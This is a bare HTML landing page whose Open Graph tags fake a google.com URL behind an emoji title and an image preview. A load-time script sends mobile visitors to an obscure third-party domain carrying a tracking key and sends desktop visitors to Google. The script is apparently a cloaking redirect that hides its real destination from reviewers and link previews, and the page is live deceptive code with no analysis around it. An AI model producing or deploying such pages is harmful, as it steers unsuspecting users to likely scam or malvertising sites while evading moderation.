
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Welcome</title>

    <meta property="og:title" content="❤💚🧡">
    <meta property="og:description" content="">
    <meta property="og:image" content="https://knadfac.pages.dev/Untitled design (58).jpg">
    <meta property="og:url" content="https://www.google.com">
    <meta property="og:type" content="website">

    <script>
    document.addEventListener('DOMContentLoaded', function() {
        var isMobile = /Android|webOS|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
        var screenWidth = window.innerWidth;

        if (isMobile || screenWidth <= 768) {
            window.location.href = "https://downconvenientmagnetic.com/ixeaxu49d0?key=c2b4f6af45f34e8bd7e407662d759620";
        } else {
            window.location.href = "https://www.google.com/";
        }
    });
    </script>
</head>
<body>
</body>
</html>
